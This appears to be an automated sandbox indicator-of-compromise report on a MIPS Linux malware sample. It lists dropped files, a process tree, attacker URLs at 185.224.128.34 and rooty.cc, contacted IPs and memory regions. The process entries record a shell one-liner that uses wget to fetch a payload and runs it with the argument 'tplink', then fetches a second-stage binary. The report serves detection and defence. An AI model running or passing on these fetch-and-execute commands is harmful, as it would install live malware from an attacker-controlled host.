IOC Report


Files

File Path | Type | Category | Malicious
/tmp/system | ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped | dropped | malicious
/tmp/shk | ASCII text | dropped |

Processes

Path | Cmdline | Malicious
/bin/sh | /bin/sh -c "cd /tmp; rm -rf shk; wget http://185.224.128.34/shk; chmod 777 shk; ./shk tplink; rm -rf shk" |
/bin/sh | - |
/usr/bin/rm | rm -rf shk |
/bin/sh | - |
/usr/bin/wget | wget http://185.224.128.34/shk |
/bin/sh | - |
/usr/bin/chmod | chmod 777 shk |
/bin/sh | - |
/bin/sh | /bin/sh ./shk tplink |
/bin/sh | - |
/usr/bin/rm | rm -rf system |
/bin/sh | - |
/usr/bin/rm | rm -rf mips |
/bin/sh | - |
/usr/bin/wget | wget http://185.224.128.34/mips -O system |
/bin/sh | - |
/usr/bin/chmod | chmod 777 system |
/bin/sh | - |
/tmp/system | ./system tplink |
/tmp/system | - |
/tmp/system | - |
/tmp/system | - |
/bin/sh | - |
/usr/bin/rm | rm -rf system |
/bin/sh | - |
/usr/bin/rm | rm -rf shk |
/usr/bin/dash | - |
/usr/bin/rm | rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby |
/usr/bin/dash | - |
/usr/bin/rm | rm -f /tmp/tmp.aWATdU1QF5 /tmp/tmp.PRIH5wqT7Y /tmp/tmp.Cs4hpwviby |

20 further processes are not shown.

URLs

Name | IP | Malicious
http://185.224.128.34/mips | 185.224.128.34 |
http://185.224.128.34/shk | 185.224.128.34 |

Domains

Name | IP | Malicious
rooty.cc | 185.224.128.34 |

IPs

IP | Domain | Country | Malicious
25.186.29.17 | unknown | United Kingdom |
107.212.160.104 | unknown | United States |
117.91.172.124 | unknown | China |
142.155.153.213 | unknown | Canada |
214.19.20.100 | unknown | United States |
118.3.19.175 | unknown | Japan |
98.168.167.168 | unknown | United States |
20.149.69.44 | unknown | United States |
253.128.244.98 | unknown | Reserved |
112.137.186.237 | unknown | Japan |
64.19.147.27 | unknown | United States |
140.45.6.27 | unknown | United States |
196.174.184.99 | unknown | Ghana |
159.232.171.75 | unknown | Switzerland |
178.19.54.207 | unknown | Iceland |
170.150.164.106 | unknown | Brazil |
205.59.146.130 | unknown | United States |
138.105.211.235 | unknown | United States |
27.123.186.212 | unknown | Fiji |
149.127.94.136 | unknown | United States |
16.0.75.111 | unknown | United States |
162.66.218.70 | unknown | United States |
245.180.32.248 | unknown | Reserved |
254.101.85.223 | unknown | Reserved |
246.184.16.162 | unknown | Reserved |
102.221.5.1 | unknown | unknown |
145.146.246.103 | unknown | Netherlands |
52.186.157.23 | unknown | United States |
151.54.223.95 | unknown | Italy |
86.251.101.150 | unknown | France |
138.231.213.68 | unknown | France |
35.118.4.255 | unknown | United States |
133.165.237.162 | unknown | Japan |
19.196.210.101 | unknown | United States |
136.164.80.135 | unknown | Norway |
247.250.115.207 | unknown | Reserved |
115.117.247.27 | unknown | India |
130.74.148.203 | unknown | United States |
12.32.11.133 | unknown | United States |
92.176.250.51 | unknown | France |
136.166.243.129 | unknown | United States |
206.177.112.156 | unknown | Canada |
151.250.138.254 | unknown | Turkey |
39.235.255.226 | unknown | Indonesia |
129.134.47.150 | unknown | United States |
174.128.255.203 | unknown | United States |
161.224.204.232 | unknown | United States |
191.134.200.230 | unknown | Brazil |
77.150.114.125 | unknown | France |
109.39.218.145 | unknown | Netherlands |
178.166.232.106 | unknown | Russian Federation |
242.4.139.255 | unknown | Reserved |
146.166.141.218 | unknown | United States |
87.88.109.146 | unknown | France |
41.171.76.135 | unknown | South Africa |
211.38.62.100 | unknown | Korea, Republic of |
28.237.108.227 | unknown | United States |
98.238.55.232 | unknown | United States |
21.46.80.3 | unknown | United States |
131.69.86.207 | unknown | United States |
75.23.105.155 | unknown | United States |
146.156.8.212 | unknown | United States |
123.252.186.59 | unknown | India |
109.172.227.147 | unknown | Georgia |
149.154.18.100 | unknown | United States |
65.9.99.136 | unknown | United States |
218.139.43.107 | unknown | Japan |
251.101.67.12 | unknown | Reserved |
70.42.217.2 | unknown | United States |
145.4.180.30 | unknown | Netherlands |
89.254.150.24 | unknown | Latvia |
205.126.159.56 | unknown | United States |
164.245.75.94 | unknown | United States |
57.10.226.162 | unknown | Belgium |
118.251.90.41 | unknown | China |
117.126.202.87 | unknown | China |
112.242.151.31 | unknown | China |
135.152.8.218 | unknown | United States |
41.74.231.222 | unknown | unknown |
148.142.94.12 | unknown | United States |
174.72.38.255 | unknown | United States |
63.188.242.150 | unknown | United States |
101.152.10.92 | unknown | China |
200.191.187.94 | unknown | Brazil |
148.22.240.59 | unknown | United States |
154.72.132.115 | unknown | Cameroon |
69.240.239.149 | unknown | United States |
37.172.212.192 | unknown | France |
246.57.245.181 | unknown | Reserved |
54.171.230.55 | unknown | United States |
46.251.115.179 | unknown | Cyprus |
214.218.60.119 | unknown | United States |
69.154.33.206 | unknown | United States |
12.61.57.1 | unknown | United States |
207.52.85.53 | unknown | United States |
21.150.40.24 | unknown | United States |
106.147.219.116 | unknown | Japan |
150.96.78.16 | unknown | Japan |
186.245.163.63 | unknown | Brazil |
77.82.180.107 | unknown | Russian Federation |

90 further IPs are not shown.

Memdumps

Base Address | Region type | Protect | Malicious
7efdd0411000 | | page execute read | malicious
7efdd0411000 | | page execute read | malicious
7efdd0411000 | | page execute read | malicious
7efdd0411000 | | page execute read | malicious
7efe50000000 | | page read and write |
55cbc51b4000 | | page execute and read and write |
7efe570da000 | | page read and write |
7efdd0453000 | | page read and write |
7ffd90d7c000 | | page execute read |
7efe56bc8000 | | page read and write |
55cbc6db7000 | | page read and write |
7efe570da000 | | page read and write |
55cbc31ac000 | | page read and write |
7efe57203000 | | page read and write |
7efe5720b000 | | page read and write |
7efdd0453000 | | page read and write |
7efe56537000 | | page read and write |
7efdd0452000 | | page read and write |
7ffd90d7c000 | | page execute read |
7efe56b88000 | | page read and write |
7efe567e7000 | | page read and write |
7ffd90d76000 | | page read and write |
7efe56529000 | | page read and write |
55cbc51b4000 | | page execute and read and write |
7efe570da000 | | page read and write |
55cbc6db7000 | | page read and write |
55cbc31ac000 | | page read and write |
7efe570da000 | | page read and write |
7ffd90d7c000 | | page execute read |
55cbc6db7000 | | page read and write |
55cbc2f24000 | | page execute read |
7efe50000000 | | page read and write |
7efe56bab000 | | page read and write |
55cbc51cb000 | | page read and write |
7efe56537000 | | page read and write |
55cbc31b6000 | | page read and write |
7efe5720b000 | | page read and write |
7efe55d21000 | | page read and write |
7efe57250000 | | page read and write |
7efe56ef9000 | | page read and write |
7ffd90d76000 | | page read and write |
55cbc51cb000 | | page read and write |
55cbc31ac000 | | page read and write |
7ffd90d76000 | | page read and write |
7ffd90d76000 | | page read and write |
7efe56537000 | | page read and write |
55cbc51b4000 | | page execute and read and write |
55cbc51b4000 | | page execute and read and write |
7efdd0452000 | | page read and write |
7efe56ef9000 | | page read and write |
7efe50000000 | | page read and write |
55cbc31b6000 | | page read and write |
7efe55d21000 | | page read and write |
7efdd0452000 | | page read and write |
7efe56537000 | | page read and write |
7efe56529000 | | page read and write |
55cbc2f24000 | | page execute read |
55cbc31b6000 | | page read and write |
7efe50021000 | | page read and write |
7efe56b88000 | | page read and write |
7efe56bc8000 | | page read and write |
7efe56b88000 | | page read and write |
7efe56529000 | | page read and write |
55cbc2f24000 | | page execute read |
7efe50021000 | | page read and write |
55cbc2f24000 | | page execute read |
7efe56ef9000 | | page read and write |
7efe55d21000 | | page read and write |
55cbc31b6000 | | page read and write |
7efe5720b000 | | page read and write |
7efe57250000 | | page read and write |
7efe56bab000 | | page read and write |
55cbc6db7000 | | page read and write |
7efe50000000 | | page read and write |
7efdd04cb000 | | page read and write |
7efdd0453000 | | page read and write |
7efe56bc8000 | | page read and write |
7efe50021000 | | page read and write |
55cbc51cb000 | | page read and write |
7efe56bab000 | | page read and write |
7efe56529000 | | page read and write |
55cbc51cb000 | | page read and write |
7efe567e7000 | | page read and write |
7efe56bc8000 | | page read and write |
7efe56bab000 | | page read and write |
7ffd90d7c000 | | page execute read |
7efe55d21000 | | page read and write |
7efdd0452000 | | page read and write |
7efe567e7000 | | page read and write |
7efe5720b000 | | page read and write |
7efe50021000 | | page read and write |
7efe56b88000 | | page read and write |
55cbc31ac000 | | page read and write |
7efe57203000 | | page read and write |
7efdd0453000 | | page read and write |
7efe56ef9000 | | page read and write |
7efe57203000 | | page read and write |
7efe57250000 | | page read and write |
7efe57250000 | | page read and write |
7efe567e7000 | | page read and write |
7efe57203000 | | page read and write |

91 further memdumps are not shown.